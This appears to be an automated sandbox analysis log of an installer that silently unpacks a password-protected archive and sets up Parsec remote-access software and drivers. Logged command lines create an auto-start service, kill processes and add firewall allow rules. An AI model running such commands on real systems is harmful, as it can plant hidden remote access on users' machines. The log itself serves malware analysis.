Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-M8LS1.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-R541B.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbdibm02.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-514OT.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsDialogs.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\System.dllJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET614C.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-66C2H.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-OGENO.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\parsecd.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-IH0UT.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dllJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeAPI coverage: 5.1 %
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeAPI coverage: 5.5 %
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeAPI coverage: 7.6 %
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeAPI coverage: 9.4 %
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp TID: 6552Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp TID: 6508Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Program Files\Parsec\pservice.exe TID: 5896Thread sleep time: -90000s >= -30000s
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe TID: 2836Thread sleep count: 81 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F78318 FindFirstFileW,FindFirstFileW,free,6_2_00F78318
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_00405C49
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_00406873 FindFirstFileW,FindClose,13_2_00406873
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_0040290B FindFirstFileW,13_2_0040290B
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD04A89C FindFirstFileExW,39_2_00007FF7CD04A89C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,45_2_00405C49
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_00406873 FindFirstFileW,FindClose,45_2_00406873
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_0040290B FindFirstFileW,45_2_0040290B
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C348EE4 FindFirstFileExW,48_2_00007FF72C348EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD85E4 FindFirstFileExW,51_2_00007FF7E5AD85E4
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,65_2_00405C49
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_00406873 FindFirstFileW,FindClose,65_2_00406873
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_0040290B FindFirstFileW,65_2_0040290B
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181985E4 FindFirstFileExW,71_2_00007FF6181985E4
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F79414 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,6_2_00F79414
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F7C7DC GetSystemInfo,6_2_00F7C7DC
Source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WindowsAzure Stack HCIHyper-V ServerWe were expecting an Os, Build and Service Pack field but we didn't get one
Source: uu8v4UUzTU.tmp, 00000002.00000002.2293815599.000000000372E000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000003.2286699133.0000000003720000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287357243.000001F011ACC000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F0112B2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F0112B2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138509714.000001F011ACB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F0112B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: pservice.exe, 00000027.00000002.3287357243.000001F011ACC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
Source: uu8v4UUzTU.tmp, 00000002.00000003.2287035653.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: onecore\base\ngscb\tpmhli\lib\pcrs.cppAMDAtmelATMLBroadcomBRCMCiscoCSCOFlySliceFLYSGoogleGOOGHPEIBMInfineonIFXIntelINTCLenovoLENMicrochipMCHPMicrosoftMSFTNational SemiconductorNSM NationzNTZNuvoton TechnologyNTCQualcommQCOMFuzhou RockchipROCCSMSCST MicroelectronicsSTM SamsungSMSNSinosunSNSTexas InstrumentTXNVMWareVMWWinbondWECTPM_PT_FAMILY_INDICATORTPM_PT_LEVELTPM_PT_REVISIONTPM_PT_DAY_OF_YEARTPM_PT_YEARTPM_PT_MANUFACTURERTPM_PT_VENDOR_STRING_1TPM_PT_VENDOR_STRING_2TPM_PT_VENDOR_STRING_3TPM_PT_VENDOR_STRING_4TPM_PT_VENDOR_TPM_TYPETPM_PT_FIRMWARE_VERSION_1TPM_PT_FIRMWARE_VERSION_2TPM_PT_INPUT_BUFFERTPM_PT_HR_TRANSIENT_MINTPM_PT_HR_PERSISTENT_MINTPM_PT_HR_LOADED_MINTPM_PT_ACTIVE_SESSIONS_MAXTPM_PT_PCR_COUNTTPM_PT_PCR_SELECT_MINTPM_PT_CONTEXT_GAP_MAXTPM_PT_NV_COUNTERS_MAXTPM_PT_NV_INDEX_MAXTPM_PT_MEMORYTPM_PT_CLOCK_UPDATETPM_PT_CONTEXT_HASHTPM_PT_CONTEXT_SYMTPM_PT_CONTEXT_SYM_SIZETPM_PT_ORDERLY_COUNTTPM_PT_MAX_COMMAND_SIZETPM_PT_MAX_RESPONSE_SIZETPM_PT_MAX_DIGESTTPM_PT_MAX_OBJECT_CONTEXTTPM_PT_MAX_SESSION_CONTEXTTPM_PT_PS_FAMILY_INDICATORTPM_PT_PS_LEVELTPM_PT_PS_REVISIONTPM_PT_PS_DAY_OF_YEARTPM_PT_PS_YEARTPM_PT_SPLIT_MAXTPM_PT_TOTAL_COMMANDSTPM_PT_LIBRARY_COMMANDSTPM_PT_VENDOR_COMMANDSTPM_PT_NV_BUFFER_MAXTPM_PT_MODESTPM_PT_MAX_CAP_BUFFERTPM_PT_PERMANENTTPM_PT_STARTUP_CLEARTPM_PT_HR_NV_INDEXTPM_PT_HR_LOADEDTPM_PT_HR_LOADED_AVAILTPM_PT_HR_ACTIVETPM_PT_HR_ACTIVE_AVAILTPM_PT_HR_TRANSIENT_AVAILTPM_PT_HR_PERSISTENTTPM_PT_HR_PERSISTENT_AVAILTPM_PT_NV_COUNTERSTPM_PT_NV_COUNTERS_AVAILTPM_PT_ALGORITHM_SETTPM_PT_LOADED_CURVESTPM_PT_LOCKOUT_COUNTERTPM_PT_MAX_AUTH_FAILTPM_PT_LOCKOUT_INTERVALTPM_PT_LOCKOUT_RECOVERYTPM_PT_NV_WRITE_RECOVERYTPM_PT_AUDIT_COUNTER_0TPM_PT_AUDIT_COUNTER_1TPM_HT_PCRTPM_HT_NV_INDEXTPM_HT_HMAC_SESSIONTPM_HT_LOADED_SESSIONTPM_HT_POLICY_SESSIONTPM_HT_SAVED_SESSIONTPM_HT_PERMANENTTPM_HT_TRANSIENTTPM_HT_PERSISTENTTPM_RH_FIRSTTPM_RH_SRKTPM_RH_OWNERTPM_RH_REVOKETPM_RH_TRANSPORTTPM_RH_OPERATORTPM_RH_ADMINTPM_RH_EKTPM_RH_NULLTPM_RH_UNASSIGNEDTPM_RH_PWTPM_RH_LOCKOUTTPM_RH_ENDORSEMENTTPM_RH_PLATFORMTPM_RH_PLATFORM_NVTPM_RH_AUTH_00TPM_RH_AUTH_FFTPM_RH_LASTTPM_INTEL_PROP_INTC_FLAGSTPM_ALG_RSATPM_ALG_SHA1TPM_ALG_HMACTPM_ALG_AESTPM_ALG_MGF1TPM_ALG_KEYEDHASHTPM_ALG_XORTPM_ALG_SHA256TPM_ALG_SHA384TPM_ALG_SHA512TPM_ALG_NULLTPM_ALG_SM3_256TPM_ALG_SM4TPM_ALG_RSASSATPM_ALG_RSAESTPM_ALG_RSAPSSTPM_ALG_OAEPTPM_ALG_ECDSATPM_ALG_ECDHTPM_ALG_KDF1_SP800_108TPM_ALG_ECCTPM_ALG_SYMCIPHERTPM_ALG_SHA3_256TPM_ALG_SHA3_384TPM_ALG_SHA3_512TPM_ALG_CTRTPM_ALG_OFBTPM_ALG_CBCTPM_ALG_CFBTPM_ALG_ECBTPM2_NV_UndefineSpaceSpecialTPM2_EvictControlTPM2_HierarchyControlTPM2_NV_UndefineSpaceTPM2_ChangeEPSTPM2_ChangePPSTPM2_ClearTPM2_ClearControlTPM2_ClockSetTPM2_HierarchyChangeAuthTPM2_NV_DefineSpaceTPM2_PCR_AllocateTPM2_PCR_SetAuthPolicyTPM2_PP_CommandsTPM2_SetPrimaryPolicyTPM2_FieldUpgradeStartTPM2_ClockRateAdjustTPM2_CreatePrimaryTPM2_NV_GlobalWriteLockTPM2_GetCommandAuditDigestTPM2_NV_IncrementTPM2_NV_SetBitsTPM2_NV_ExtendTPM2_NV_WriteTPM2_NV_WriteLockTPM2_DictionaryAttackLockResetT
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeAPI call chain: ExitProcess graph end nodegraph_13-3589
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeAPI call chain: ExitProcess graph end node
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD0470C8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00007FF7CD0470C8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FC6550 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,fputs,fputs,6_2_00FC6550
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD040D20 GetProcessHeap,39_2_00007FF7CD040D20
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD047274 SetUnhandledExceptionFilter,39_2_00007FF7CD047274
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD046D74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00007FF7CD046D74
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD0470C8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00007FF7CD0470C8
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03B0C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00007FF7CD03B0C4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C327050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,48_2_00007FF72C327050
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3318AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF72C3318AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3272FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF72C3272FC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3274A4 SetUnhandledExceptionFilter,48_2_00007FF72C3274A4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AB6840 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,51_2_00007FF7E5AB6840
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC10DC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_00007FF7E5AC10DC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AB6AEC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_00007FF7E5AB6AEC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AB6CD0 SetUnhandledExceptionFilter,51_2_00007FF7E5AB6CD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618176AEC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,71_2_00007FF618176AEC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618176CD0 SetUnhandledExceptionFilter,71_2_00007FF618176CD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181810DC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,71_2_00007FF6181810DC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618176840 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,71_2_00007FF618176840
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /SJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /SJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop ParsecJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete ParsecJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exeJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "winsta0\default" "0000000000000160" "208" "c:\program files\parsec virtual usb adapter driver\parsecvusba"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "winsta0\default" "0000000000000158" "208" "c:\program files\parsec virtual usb adapter driver\parsecvirtualds"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "winsta0\default" "0000000000000160" "208" "c:\program files\parsec virtual usb adapter driver\parsecvusba"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "winsta0\default" "0000000000000158" "208" "c:\program files\parsec virtual usb adapter driver\parsecvirtualds"
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD032130 SHGetKnownFolderPath,CoTaskMemFree,RegisterServiceCtrlHandlerExW,SetServiceStatus,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,GetLastError,SetServiceStatus,SetServiceStatus,ConnectNamedPipe,GetLastError,GetNamedPipeClientProcessId,ProcessIdToSessionId,WTSGetActiveConsoleSessionId,OpenProcess,QueryFullProcessImageNameW,CloseHandle,OpenProcess,OpenProcessToken,SHGetKnownFolderPath,CoTaskMemFree,CloseHandle,CloseHandle,ReadFile,WriteFile,DisconnectNamedPipe,EnterCriticalSection,GetExitCodeProcess,CloseHandle,LeaveCriticalSection,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,SendSAS,RegCloseKey,OpenProcess,WriteFile,DisconnectNamedPipe,CloseHandle,CloseHandle,SetServiceStatus,39_2_00007FF7CD032130
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FCE460 cpuid 6_2_00FCE460
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,48_2_00007FF72C34CEEC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,48_2_00007FF72C344FBC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,48_2_00007FF72C34D934
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,48_2_00007FF72C34D5F8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,48_2_00007FF72C34D750
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,48_2_00007FF72C34D800
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,48_2_00007FF72C34D248
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,48_2_00007FF72C34D318
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,48_2_00007FF72C34D3B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,48_2_00007FF72C34543C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,51_2_00007FF7E5AD46BC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,51_2_00007FF7E5ADC690
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,51_2_00007FF7E5ADC5F8
